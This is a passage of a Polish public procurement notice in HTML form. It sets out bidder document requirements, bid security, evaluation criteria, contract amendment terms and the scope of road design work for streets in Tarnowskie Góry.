              </b><br /><div style="padding-left: 20px">) aktualnego odpisu z właściwego rejestru lub centralnej ewidencji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, b) zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłaceniem podatków, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert lub inny dokument potwierdzający, że wykonawca zawarł porozumienie z właściwym organem podatkowym w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu. c) Zaświadczenie właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo inny dokument potwierdzający, że wykonawca nie zalega z opłaceniem składek na ubezpieczenie społeczne lub zdrowotne, wystawiony nie wcześniej niż 3 miesiące przed terminem składania ofert, lub inny dokument potwierdzający, że wykonawca zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu. UWAGA! W przypadku składania oferty wspólnej ww zaświadczenia składa każdy z wykonawców składających ofertę wspólną. W przypadku składania oferty przez spółkę cywilną wykonawca musi złożyć oddzielne zaświadczenie dla każdego ze wspólników oraz oddzielnie na spółkę. WW dokumenty należy złożyć w orginale lub kopii potwierdzonej za zgodność z oryginałem. UWAGA! W przypadku wskazania przez Wykonawcę dostępności oświadczeń lub dokumentów, w formie elektronicznej pod określonymi adresami internetowymi ogólnodostępnych i bezpłatnych baz danych, Zamawiający pobiera samodzielnie z tych baz danych wskazane przez Wykonawcę oświadczenia lub dokumenty 1. Dokumenty składane przez Wykonawcę mającego siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej. 7.1 Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, w celu potwierdzenia braku podstaw wykluczenia wskazanego w pkt 2.2.1 - składa dokument lub dokumenty wystawione w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości. 7.2 Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, w celu potwierdzenia braku podstaw wykluczenia wskazanego w pkt 2.2.3 - składa dokument lub dokumenty wystawione w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie zalega z opłaceniem podatków, opłat , składek na ubezpieczenie społeczne lub zdrowotne albo że zawarł porozumienie z właściwym organem w sprawie spłat tych należnoęci wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie , odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwemu organu. 7.3 Dokumenty, o których mowa w pkt 7.1. niniejszego rozdziału SIWZ, powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, natomiast w pkt 7.2 nie wcześniej niż 3 miesiące przed upływem terminu składania ofert 7.4 Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania ma osoba, której dokument dotyczy, nie wydaje się dokumentów, o których mowa w pkt 7.1. i 7.2 niniejszego rozdziału SIWZ, zastępuje się je dokumentem zawierającym odpowiednio oświadczenie Wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone przed notariuszem lub przed organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy lub miejsce zamieszkania tej osoby. Postanowienia pkt 7.3. niniejszego rozdziału SIWZ stosuje się. </div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br /><br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">1) W celu potwierdzenia braku podstawy do wykluczenia Wykonawcy z postępowania, o której mowa w art. 24 ust. 1 pkt 23 ustawy, Wykonawca składa, stosownie do treści art. 24 ust. 11 ustawy (w terminie 3 dni od dnia zamieszczenia przez Zamawiającego na stronie internetowej informacji z otwarcia ofert, tj. informacji, o których mowa w art. 86 ust. 5 ustawy), oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt 23 ustawy (wzór oświadczenia zostanie dołączony do informacji z otwarcia ofert). Wraz ze złożeniem oświadczenia, Wykonawca może przedstawić dowody, że powiązania z innym Wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzieleniu zamówienia. 2) Formularz Ofertowy zgodnie z załącznikiem nr 1 do SIWZ. 3) Oświadczenia zgodnie z załącznikiem nr 2 i nr 3 do SIWZ (oświadczenia z art 25a ustawy) które należy złożyć w formie pisemnej. 4) O ile Wykonawca korzysta ze zdolności lub sytuacji innych podmiotów na zasadach określonych w art. 22a ustawy Pzp, przedkłada w ofercie pisemne zobowiązanie innego podmiotu dotyczące oddania Wykonawcy do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia. Wykonawca, który powołuje się na zasoby innych podmiotów, w celu wykazania braku istnienia wobec nich podstaw wykluczenia oraz spełniania, w zakresie, w jakim powołuje się na ich zasoby, warunków udziału w postępowaniu zamieszcza informacje o tych podmiotach w oświadczeniach, o których mowa w punkcie 2.2.SIWZ. 5) Pełnomocnictwo ustanowione do reprezentowania Wykonawcy/ów ubiegającego/cych się o udzielenie zamówienia publicznego. Pełnomocnictwo należy dołączyć w oryginale bądź kopii, potwierdzonej za zgodność z oryginałem notarialnie. 6) Dowód wniesienia wadium: kopii potwierdzenia nadania przelewu. 7) zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłaceniem podatków, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert lub inny dokument 8) Zaświadczenie właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo inny dokument potwierdzający, że wykonawca nie zalega z opłaceniem składek na ubezpieczenie społeczne lub zdrowotne, wystawiony nie wcześniej niż 3 miesiące przed terminem składania ofert, </div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />Oferta musi być zabezpieczona wadium w wysokości:
1.	Część nr 1: 500,00 zł 
2.	Część nr 2: 500,00 zł 
3.	Część nr 3: 400,00 zł

</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Doświadczenie projektanta</td><td>25</td></tr><tr><td>Kara za zwłokę </td><td>15</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />2. Dopuszcza się możliwość dokonania zmian postanowień umowy w stosunku do treści oferty, jeżeli konieczność wprowadzenia takich zmian wynika z następujących okoliczności: 1) Zmiany terminu realizacji przedmiotu umowy, w następstwie: a) siły wyższej - rozumianej jako wystąpienie zdarzenia nadzwyczajnego, zewnętrznego, niemożliwego do przewidzenia i zapobieżenia, którego nie dało się uniknąć nawet przy zachowaniu najwyższej staranności a które uniemożliwia Wykonawcy wykonanie jego zobowiązania w całości lub części. W razie wystąpienia siły wyższej Strony umowy zobowiązane są dołożyć wszelkich starań w celu ograniczenia do minimum opóźnienia w wykonywaniu swoich zobowiązań umownych, powstałego na skutek działania siły wyższej. (Pod pojęciem siły wyższej rozumie się w szczególności zdarzenia i okoliczności takie jak: klęska żywiołowa, działania wojenne, rebelie, terroryzm, rewolucja, powstanie, inwazja, bunt, zamieszki, strajk spowodowany przez inne osoby, nie związane z realizacją inwestycji), Termin wykonania umowy ulega odpowiednio zmianie o okres trwania okoliczności celem ukończenia przedmiotu umowy w sposób należyty. Zmiana terminu realizacji przedmiotu umowy nie wpływa na zmianę wynagrodzenia. 2) Zmiany wynagrodzenia, w następstwie: a) zmiany będącej skutkiem działań organów państwowych - ustawowa zmiana obowiązującej stawki podatku od towarów i usług VAT lub wprowadzenie nowego podatku. W takim przypadku wartość wynagrodzenia netto nie ulega zmianie, jedynie wartość wynagrodzenia brutto zostanie wyliczona na podstawie nowych przepisów. Zmiana wynagrodzenia odnosić się będzie do części przedmiotu umowy niezrealizowanej, po dniu wejścia w życie przepisów zmieniających lub wprowadzających stawkę podatku od towarów i usług VAT oraz do części przedmiotu umowy, do której zastosowanie znajdzie zmiana stawki podatku od towarów i usług VAT lub wprowadzenie nowego podatku. W przypadku zaistnienia opisanej sytuacji po wejściu w życie przepisów będących przyczyną waloryzacji, Wykonawca zwraca się do Zamawiającego z wnioskiem o dokonanie odpowiedniej zmiany wynagrodzenia  wskaże kwotę, o którą wynagrodzenie Wykonawcy ma ulec zmianie, oraz datę, od której nastąpiła bądź nastąpi zmiana wysokości kosztów wykonania umowy uzasadniająca zmianę wysokości wynagrodzenia należnego Wykonawcy. Zmiana stawki podatku VAT nie dotyczy Wykonawców którzy zadeklarowali w ofercie, iż nie są płatnikami podatku VAT, b) rezygnacji przez Zamawiającego z realizacji części przedmiotu umowy. W takim przypadku Zamawiający zapłaci wynagrodzenie z tytułu wykonania części przedmiotu umowy, 3) Zmiany osoby/osób przy pomocy której/ych Wykonawca realizuje przedmiot umowy. W przypadku braku możliwości wykonywania przedmiotu umowy przez wskazaną/e osobę/y, (rozwiązanie umowy, śmierć, długotrwała choroba, utrata uprawnień, inne uzasadnione okoliczności niepozwalające wykonywać wskazanym osobom powierzone czynności) wówczas Wykonawca może powierzyć te czynności innym osobom o kwalifikacjach (uprawnieniach) spełniających co najmniej takie warunki jakie podano w specyfikacji istotnych warunków zamówienia (SIWZ) dla przeprowadzonego postępowania. 4) Zmiany powszechnie obowiązujących przepisów prawa mających wpływ na treść złożonej oferty w takim zakresie w jakim będzie to niezbędne w celu dostosowania postanowień Umowy do zaistniałego stanu prawnego, 5) Zastąpienia Wykonawcy, któremu Zamawiający udzielił zamówienia, nowym wykonawcą w wyniku połączenia, podziału, upadłości, restrukturyzacji lub nabycia dotychczasowego Wykonawcy lub jego przedsiębiorstwa, o ile nowy wykonawca spełnia warunki udziału w postępowaniu i nie zachodzą wobec niego podstawy wykluczenia na podstawie art.24 ust.1. ustawy Pzp oraz nie pociąga to za sobą innych istotnych zmian umowy, lub przekształcenie Wykonawcy będącego następstwem sukcesji uniwersalnej, w związku z sukcesją generalną, dziedziczeniem spółek handlowych zgodnie z KSH, a także sukcesją z mocy prawa, zgodnie z obowiązującymi przepisami prawa. Przekształcony Wykonawca musi nadal spełniać warunki udziału w postępowaniu oraz nie mogą zachodzić wobec niego podstawy wykluczenia na podstawie art. 24 ust. ustawy Pzp. 3. Zmianie podlegają także inne postanowienia w stosunku do treści oferty jeżeli konieczność wprowadzenia takich zmian wynika z następujących okoliczności: 1) Zmiana koordynatora ze strony Zamawiającego, w przypadku braku możliwości wykonywania wskazanych czynności przez tę osobę - zmiana ta następuje poprzez pisemne zgłoszenie tego faktu drugiej Stronie i nie wymaga zawarcia aneksu do umowy, 4. Zmiana danych związana z obsługą administracyjno-organizacyjną umowy, zmiana danych teleadresowych Wykonawcy lub Zamawiającego - zmiana ta następuje poprzez pisemne zgłoszenie tego faktu drugiej Stronie i nie wymaga zawarcia aneksu do umowy. Zmiana nazwy Wykonawcy - winno nastąpić w formie aneksu do umowy. 5. Zmiany postanowień umowy następują zgodnie z zasadami określonymi w umowie oraz przy zastosowaniu przepisów ustawy Prawo zamówień publicznych i nie mogą prowadzić do zmiany charakteru umowy. 6. W przypadku wystąpienia okoliczności stanowiących podstawę do zmiany umowy, każda ze Stron może wystąpić z wnioskiem na piśmie w sprawie możliwości dokonania takiej zmiany. We wniosku należy opisać, uzasadnić zmianę oraz dołączyć stosowne dokumenty  dotyczy to przypadków kiedy dla potwierdzenia dokonania zmiany zasadnym jest przedłożenie odpowiednich dokumentów. 7. Wszelkie zmiany i uzupełnienia niniejszej umowy dokonane w sposób zgodny z ustawą Prawo zamówień publicznych wymagają formy pisemnej pod rygorem nieważności - aneks do umowy, z zastrzeżeniem przypadków określonych w niniejszym paragrafie, w których wskazano, że nie jest wymagane zawarcie aneksu do umowy. 8. Zmiana umowy dokonana z naruszeniem przepisów ustawy Prawo zamówień publicznych jest nieważna. <br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 27/03/2017, godzina: 09:45,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>Wykonanie dokumentacji projektowej (projekt budowlany i wykonawczy) dla zadania pn.: Rozbudowa ulicy Towarowej  w Tarnowskich Górach.<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1.	Zakres prac obejmuje:  
 - przebudowę pasa drogowego w zakresie jak na załączonej mapce poglądowej na ulicy Towarowej (odcinek od ulicy Opolskiej do ulicy Wincentego Pola) w Tarnowskich Górach,
- rozbudowa obejmowała będzie w szczególności: wykonanie chodnika, miejsc postojowych, poprawę geometrii skrzyżowań oraz wzmocnienie istniejącej nawierzchni jezdni.
- zagospodarowanie pasa zieleni (ewentualna wycinka drzew + plan nasadzeń),
- przebudowa i zabezpieczenie sieci infrastruktury podziemnej i naziemnej ( w koniecznych przypadkach i wg wskazań Zamawiającego),
- konieczną przebudowę odwodnienia nawierzchni,
- pełnienie nadzoru autorskiego w czasie trwania realizacji projektu,
- wykonanie koncepcji wariantowych rozwiązań projektowych.

2.	 Dokumentacja projektowa powinna zawierać:
- projekt budowlany dla branż: drogowej oraz innych koniecznych branż,
- projekt wykonawczy dla branż: drogowej oraz innych koniecznych branż,
- wstępne koncepcje wariantowych rozwiązań projektowych  ( w wersji papierowej i elektronicznej),
- mapy do celów projektowych z uzgodnieniami branżowymi  w każdym egzemplarzu projektu,

- wypis i wyrys z rejestru gruntów  z odpisami z ksiąg wieczystych - w każdym egzemplarzu projektu,
- decyzję o uwarunkowaniach środowiskowych (jeśli taka będzie wymagana)  w każdym egzemplarzu projektu,
- decyzję na wycinkę drzew i krzewów (jeśli taka będzie wymagana)  w każdym egzemplarzu projektu,
- uzgodnienia wszelkich kolizji z gestorami właściwych sieci infrastruktury technicznej
  i teletechnicznej - w każdym egzemplarzu projektu,
- zgody na wejście w teren na czas realizacji inwestycji  w każdym egzemplarzu projektu,
- szczegółową specyfikację techniczną wykonania i odbioru robót dla każdej branży  2 egz.,
- informację dotyczącą bezpieczeństwa i ochrony zdrowia  w każdym egzemplarzu projektu,
- przedmiary robót wraz z kosztorysami inwestorskimi  2 egz. (z podziałem na etapy realizacyjne),
- wszelkie konieczne uzgodnienia, decyzje, pozwolenia i opinie  w każdym projekcie,
- wersję elektroniczną dla wszystkich pozycji,
- komplet dokumentów wymaganych do złożenia wniosku o pozwolenie na budowę

3.	Wykonawca w dokumentacji projektowej winien uwzględnić:
- inwentaryzację dendrologiczną istniejącego drzewostanu,
- odwodnienie pasa drogowego,
- rozwiązania kolizji z sieciami  jeśli takowe wystąpią,
- wykonanie badań geotechnicznych podłoża gruntowego,
- wykonanie i zatwierdzenie projektu zmiany organizacji ruchu na czas prowadzenia robót oraz docelowej,
- pełnienie nadzoru autorskiego w czasie trwania realizacji przedmiotowego projektu wg potrzeb Zamawiającego, przygotowanie wyjaśnień, odpowiedzi do opracowanej dokumentacji i przekazywanie ich Zamawiającemu w wyznaczonym przez niego terminie,
- wymagania w zakresie dostępności dla wszystkich użytkowników, w tym dla osób niepełnosprawnych.

4.	Wykonawca jest zobowiązany  do uczestniczenia w organizowanych przez Zamawiającego spotkaniach i naradach, w tym między innymi:
a) w spotkaniach, podczas których prezentowane będą koncepcje proponowanych rozwiązań,
b) w dyskusjach publicznych nad przyjętymi rozwiązaniami,

5. Wykonawca winien przekazać Zamawiającemu przedmiot zamówienia w następujących formach i ilościach:
a) w formie elektronicznej  - w 2 egzemplarzach (tekst w programie Microsoft World, rysunki w JPG, PDF),
b) w formie papierowej  - w 5 egzemplarzach,
c) w formie elektronicznej nieedytowalnej (pliki pdf) oraz edytowalnej (tekst  pliki doc i xls, rysunki  pliki dwg).
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>71320000-7, 71248000-8<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 08/12/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Doświadczenie projektan</td><td>25</td></tr><tr><td>Kara za zwłokę</td><td>15</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>Wykonanie dokumentacji projektowej (projekt budowlany i wykonawczy) dla zadania pn.: Rozbudowa ulic: Wiejska i Sielanka w Tarnowskich Górach.<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1.	Zakres prac obejmuje:  
 - przebudowę pasa drogowego w zakresie jak na załączonej mapce poglądowej na ulicy Wiejskiej i Sielanka w Tarnowskich Górach,
- rozbudowa obejmowała będzie w szczególności: wykonanie chodnika, poprawę geometrii skrzyżowań oraz wzmocnienie istniejącej nawierzchni jezdni.
- zagospodarowanie pasa zieleni (ewentualna wycinka drzew + plan nasadzeń),
- przebudowa i zabezpieczenie sieci infrastruktury podziemnej i naziemnej ( w koniecznych przypadkach i wg wskazań Zamawiającego),
- konieczną przebudowę odwodnienia nawierzchni,
- pełnienie nadzoru autorskiego w czasie trwania realizacji projektu,
- wykonanie koncepcji wariantowych rozwiązań projektowych.

2.	 Dokumentacja projektowa powinna zawierać:
- projekt budowlany dla branż: drogowej oraz innych koniecznych branż,
- projekt wykonawczy dla branż: drogowej oraz innych koniecznych branż,
- wstępne koncepcje wariantowych rozwiązań projektowych  ( w wersji papierowej i elektronicznej),
- mapy do celów projektowych z uzgodnieniami branżowymi  w każdym egzemplarzu projektu,
- wypis i wyrys z rejestru gruntów  z odpisami z ksiąg wieczystych - w każdym egzemplarzu projektu,
- decyzję o uwarunkowaniach środowiskowych (jeśli taka będzie wymagana)  w każdym egzemplarzu projektu,
- decyzję na wycinkę drzew i krzewów (jeśli taka będzie wymagana)  w każdym egzemplarzu projektu,
- uzgodnienia wszelkich kolizji z gestorami właściwych sieci infrastruktury technicznej
  i teletechnicznej - w każdym egzemplarzu projektu,
- zgody na wejście w teren na czas realizacji inwestycji  w każdym egzemplarzu projektu,
- szczegółową specyfikację techniczną wykonania i odbioru robót dla każdej branży  2 egz.,
- informację dotyczącą bezpieczeństwa i ochrony zdrowia  w każdym egzemplarzu projektu,
- przedmiary robót wraz z kosztorysami inwestorskimi  2 egz. (z podziałem na etapy realizacyjne),
- wszelkie konieczne uzgodnienia, decyzje, pozwolenia i opinie  w każdym projekcie,
- wersję elektroniczną dla wszystkich pozycji,
- komplet dokumentów wymaganych do złożenia wniosku o pozwolenie na budowę

